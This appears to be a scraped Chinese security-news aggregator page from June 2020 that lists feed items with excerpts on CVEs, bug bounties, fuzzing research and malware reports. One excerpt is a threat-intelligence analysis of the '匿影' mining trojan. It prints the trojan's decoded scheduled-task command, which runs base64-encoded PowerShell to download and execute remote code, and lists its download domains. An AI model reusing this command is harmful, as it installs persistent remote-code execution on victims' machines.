每日更新 / 推荐
时间 | 节点 | |
---|---|---|
2020年6月9日 15:09 | 看雪论坛 | |
2020年6月9日 15:08 | T00ls论坛 | |
2020年6月9日 14:45 | 360安全客 | CVE-2020-0022 蓝牙漏洞初探(上)一个bug引发的血案 ![]() 本次为大家带来的是CVE-2020-0022 漏洞研究的第一部分。近年来,蓝牙已成为可移动设备的标配,在手机、智能手表等电子产品的短距离数据传输场景得以广泛应用。 |
2020年6月9日 14:44 | T00ls论坛 | |
2020年6月9日 14:44 | T00ls论坛 | |
2020年6月9日 14:29 | T00ls论坛 | |
2020年6月9日 14:09 | freebuf | |
2020年6月9日 14:09 | freebuf | |
2020年6月9日 14:07 | hackernews.cc | Linux 再次严辞拒绝 Intel CPU 漏洞补丁 近日,Linux 内核项目负责人 Linus Torvalds 拒绝了 AWS 工程师提交的一个补丁,该补丁的目的是减轻 Intel CPU 遭遇一种新型窥探攻击而导致数据泄露的风险。 这种新型攻击名为“探听辅助 L1 数据采样攻击”,简称 Snoop (CVE-2020-0550)。今年 3 月,来自 AWS 的软件工程师 Pawel Wieczorkiewicz 率先发现了 Intel 处理器的这一漏洞,它可能会泄露 CPU 内部存储器或缓存中的数据,涉及 CPU 包括 Intel 旗下流行的 Xeon 和 Core 系列处理器。Pawel 迅速向 Intel 报告了此问题,随后该漏洞被 Intel 定位为中等严重性漏洞。 新的 Snoop 攻击利用了 Intel CPU 多级缓存、缓存一致性和总线监听等特性,通过位于 CPU 内核中的一级数据缓存(L1D),通过“总线监听”(bus snooping)功能 —— 在 L1D 中修改数据时发生的缓存更新操作,将数据从 CPU 中泄漏出来。 以近代 CPU 的视角来说,计算机通常会采用三级缓存的设计来提高 CPU 的运行效率。三级缓存包括 L1 一级缓存、L2 二级缓存、L3 三级缓存,这些缓存都集成在 CPU 内,它们的作用是作为 CPU 与主内存之间的高速数据缓冲区。其中 L1 最靠近 CPU 核心;L2其次;L3再次。运行速度方面:L1最快、L2次快、L3最慢;容量大小方面:L1最小、L2较大、L3最大。在执行一项任务时,CPU 会先在最快的 L1 中寻找需要的数据,找不到再去找次快的 L2,还找不到再去找 L3,L3 都没有才去内存找。 而一级缓存其实还分为一级数据缓存(Data Cache,D-Cache,L1D)和一级指令缓存(Instruction Cache,I-Cache,L1I),分别用于存放数据及执行数据的指令解码,两者可同时被CPU 访问,减少了 CPU 多核心、多线程争用缓存造成的冲突,提高了处理器的性能。一般CPU 的 L1I 和 L1D 具备相同的容量,例如 I7-8700K 的 L1 即为 32KB+32KB。Snoop 攻击就是一种窃取 L1D 缓存中数据的攻击手段。 不过 Intel 的用户也不用惊慌,据 Intel 官方解释说,这种新攻击「很难实施」,并且不会泄露大量数据,毕竟 L1D 缓存中的数据非常有限,并且只有在任务运 |
2020年6月9日 13:47 | 看雪论坛 | |
2020年6月9日 13:47 | 看雪论坛 | |
2020年6月9日 13:27 | freebuf | |
2020年6月9日 13:06 | freebuf | 挖洞经验 | 由Google Voice插件触发的DOM-XSS漏洞 ![]() 本文讲述了作者在安装了Google Voice插件的环境中,通过Gmail接收邮件时偶尔发现的一个DOM XSS漏洞,经对Google Voice插件的源代码分析,最终找到了漏洞根源。漏洞获得了谷歌$3,133.7的奖励。 |
2020年6月9日 12:24 | freebuf | 被“偷窥”的我们:手机App频繁自启动收集隐私信息 ![]() “优学院”十几分钟访问手机照片文件近25000次;“TIM”一小时内自启动近7000次频繁读取通讯录;“全民K歌”“王者荣耀”“新浪微博”可唤醒手机里其余十几个App一起在后台偷偷运行…… |
2020年6月9日 12:03 | freebuf | |
2020年6月9日 11:40 | hackernews.cc | WhatsApp 漏洞或已暴露用户的手机号码 某安全研究人员透露,WhatsApp 惊现一个允许在谷歌搜索引擎上暴露用户手机号码的 bug 。虽然不是所有用户的号码都被暴露,但这个问题还是引发了他们的关注。但若用户只与自己认识的 WhatsApp 用户交谈过(未使用过群组邀请链接),便有很大的几率不会受到本次漏洞的影响。   安全研究人员 Athul Jayaram 表示,WhatsApp 高管已经知晓了这个问题,但却对此无动于衷。据悉,该问题与今年早些时候推出的 WhatsApp 二维码功能有关。 WhatsApp 先前发布的群组邀请链接的工作方式,不同于新的二维码功能,但前者显然要更安全一些 —— 因为后者使用了未加密的 http://wa.me/ 短网址系统、且并未在链接中隐藏用户的电话号码。 当用户在新系统上分享二维码时,如果该网址被谷歌爬虫抓取,便极有可能被编入搜索引擎的索引结果中。如果你担心自己的号码也被意外收入,请通过 site:wa.me + 国家 / 地区代码的方式检索核实。 目前,如果通过 site:api.whatsapp.com 的方式检索,谷歌搜索引擎还会返回成千上万的检索结果。但除非 WhatsApp 高层正视该问题,否则此事的负面影响肯定还会持续。     (稿源:cnBeta,封面源自网络。) |
2020年6月9日 11:20 | 360安全客 | 用于UAF漏洞的二进制级定向模糊测试 ![]() 我们提出了“UAFuzz”,这是第一个专用于UAF bugs的(二进制级)定向灰盒模糊测试器(Greybox Fuzzer)。该技术的特点是一个根据UAF的具体情况定制的模糊测试引擎、一个轻量级的代码插装和一个高效的bug分类步骤。 |
2020年6月9日 11:20 | 看雪论坛 | |
2020年6月9日 11:20 | 看雪论坛 | |
2020年6月9日 11:20 | T00ls论坛 | |
2020年6月9日 11:20 | T00ls论坛 | |
2020年6月9日 11:19 | hackernews.cc | “匿影”挖矿木马持续活跃,入侵某旅游网站做病毒下载服务器 感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/WoYcqgC-xXtM2s752215yQ 一、背景 腾讯安全威胁情报中心检测到“匿影”挖矿木马变种攻击。该变种木马依然利用永恒之蓝漏洞进行攻击传播,通过计划任务、WMI后门进行本地持久化,然后在攻陷机器下载XMRig矿机挖矿门罗币、下载nbminer矿机挖矿HNS(Handshake),还会利用regsvr32.exe加载执行DLL形式的木马程序,匿影木马新变种在已安装腾讯电脑管家等数款安全软件的电脑上不运行,试图避免被安全厂商检测到。 “匿影”挖矿木马擅长利用利用各类公共网址进行数据统计和木马下载,此次变种攻陷了某旅游文化网站并将其作为木马下载服务器,其使用过的公共网址如下: upload.ee 免费网盘 anonfiles.com 免费图床 sowcar.com 免费图床 popo8.com 免费图床 img.vim-cn.com 免费图床 urlxxx.at.ua 建站服务 mywebnew.ucoz.pl 建站服务 addressnet.do.am 建站服务 googlenew.moy.su 建站服务 ludengapp.com 某设计公司网站 worldyou.top 某文旅公司网站(新) 二、样本分析 “匿影”挖矿木马释放永恒之蓝漏洞利用攻击程序包到C:\Users\Public目录下并启动主程序storageg.exe开始扫描攻击。   在攻陷的目标机器执行Payload(x86.dll或x64.dll), Payload会检测腾讯电脑管家、金山毒霸等杀软是否存在,若不存在继续执行一段Base64编码的Powershell命令。 Base64编码的Powershell命令解码后内容如下: schtasks /create /ru system /sc MINUTE /mo 80 /tn VNware /tr "powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBtAHkAdwBlAGIAcwBhA |
2020年6月9日 11:00 | 腾讯玄武实验室推送 | Ghidra源码分析(一) Ghidra 源码分析(一) |
2020年6月9日 11:00 | 腾讯玄武实验室推送 | A journey in reversing UEFI Lenovo Passwords Management 联想 ThinkPad System Management Mode (SMM) 管理 UEFI 密码的过程逆向分析 |
2020年6月9日 11:00 | 腾讯玄武实验室推送 | GuLoader? No, CloudEyE. - Check Point Research 意大利公司帮助攻击者利用云服务分发恶意软件 |
2020年6月9日 11:00 | 腾讯玄武实验室推送 | Steps to reproduce gitlab-workhorse `allowed_paths` 路径限制 Bypass 漏洞 |
2020年6月9日 11:00 | 腾讯玄武实验室推送 | Retrieving ntdll Syscall Stubs from Disk at Run-time Retrieving ntdll Syscall Stubs from Disk at Run-time |
2020年6月9日 11:00 | 腾讯玄武实验室推送 | Postprocess Hexrays Decompiler Output 优化 IDA Hexrays 反编译后 C 代码的插件 |
2020年6月9日 11:00 | 腾讯玄武实验室推送 | Adaz: Active Directory Hunting Lab in Azure 在 Azure 云环境部署 Active Directory Hunting Lab 的工具 |
2020年6月9日 10:59 | 360安全客 | 从"新"开始学习恶意代码分析——再静态分析 ![]() 在上一小节,我们已经通过纯静态分析的方式分析了一个Downloader的恶意样本。在这一节,我们通过第二个Downloader对静态分析进行一些巩固。分析的样本hash:0b244c84e6f86a6c403b9fb5e98df8cb。 |
2020年6月9日 10:59 | 看雪论坛 | |
2020年6月9日 10:38 | 360安全客 | 针对列车控制系统的多通道中间人攻击 ![]() 本文考虑了对基于WLAN的火车到路边通信的多通道中间人(MitM)攻击,提出的攻击方法可以操纵802.11帧,并带来延迟、丢包、甚至可以修改火车与路边设备之间传输的消息。 |
2020年6月9日 10:18 | freebuf | |
2020年6月9日 10:18 | freebuf | |
2020年6月9日 09:56 | 看雪论坛 | |
2020年6月9日 09:35 | hackone | CSRF header is sent to external websites when using data-remote forms 影响厂商:Ruby on Rails 奖励: 危险等级:low 使用数据远程表单时,CSRF标头发送到外部网站 |
2020年6月9日 09:35 | 先知社区 | |
2020年6月9日 09:35 | 先知社区 | |
2020年6月9日 09:35 | 先知社区 | |
2020年6月9日 09:35 | 先知社区 | |
2020年6月9日 09:15 | freebuf | |
2020年6月9日 09:15 | freebuf | FreeBuf早报|身份证丢失后被入职16家公司,网友:走上人生巅峰;美国民兵III核武器信息遭泄露;严重漏洞可使攻击者控制交通信号灯 ![]() 一黑客从美国军事承包商韦斯特赫(Westech)窃取了机密文件,该文件提供了美国民兵III核武器的关键信息。 |
2020年6月9日 08:33 | freebuf | |
2020年6月9日 08:12 | freebuf | |
2020年6月9日 08:11 | 看雪论坛 | |
2020年6月9日 06:47 | hackone | Untrusted strings that are cache fetched with raw option are automatically marshal loaded 影响厂商:Ruby on Rails 奖励: 危险等级:high 使用原始选项缓存获取的不受信任的字符串将自动封送处理 |
2020年6月9日 05:23 | 看雪论坛 | |
2020年6月9日 00:10 | SecWiki周报 | SecWiki News 2020-06-08 Review 玖色直播安全情报报告 https://www.anquanke.com/post/id/207825 探索如何使用自动化实现对恶意JavaScript脚本的反混淆处理 https://www.anquanke.com/post/id/207813 开源软件供应链攻击回顾 https://www.anquanke.com/post/id/207836 Predict attacker groups from the techniques and software used https://github.com/omergunal/Attacker-Group-Predictor ScanCVE: 监控Github上CVE增量 https://github.com/grayddq/ScanCVE Java 8u20反序列化漏洞分析 http://blog.topsec.com.cn/java-8u20%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90/ 从CVE-2018-4441看jsc的OOB利用 http://blog.topsec.com.cn/%e4%bb%8ecve-2018-4441%e7%9c%8bjsc%e7%9a%84oob%e5%88%a9%e7%94%a8/ SecWiki周刊(第327期) https://www.sec-wiki.com/weekly/327 基于正则的VSCode代码审计插件 https://github.com/m4yfly/vscode-maudit MSSQL注入 突破不能堆叠的限制执行系统命令 https://mp.weixin.qq.com/s/CcgUb7mLlP2xjcrpy5VGbQ AISecOps:打造可信任安全智能 https://mp.weixin.qq.com/s/Tz9V05CHqLg_Wt4yfJZffQ GREYONE: Data Flow Sensitive Fuzzing https://securitygossip.com/blog/2020/05/29/greyone-data-flow-sensitive-fuzzing/ Monstra CMS RCE漏洞分析(CVE-2020-13384) https://xz.aliyun.com/ |
2020年6月8日 22:24 | 看雪论坛 | |
2020年6月8日 22:23 | T00ls论坛 | |
2020年6月8日 22:01 | T00ls论坛 | |
2020年6月8日 21:19 | T00ls论坛 | |
2020年6月8日 20:37 | T00ls论坛 | |
2020年6月8日 20:37 | T00ls论坛 | |
2020年6月8日 20:37 | T00ls论坛 | |
2020年6月8日 20:16 | T00ls论坛 | |
2020年6月8日 20:16 | T00ls论坛 | |
2020年6月8日 19:56 | 看雪论坛 | |
2020年6月8日 18:33 | 腾讯玄武实验室推送 | IBM Releases Fully Homomorphic Encryption Toolkit for MacOS and iOS IBM发布了适用于MacOS和iOS的同态加密(fully homomorphic encryption FHE)工具包;适用于Android和Linux的工具包即将面世。 |
2020年6月8日 18:11 | freebuf |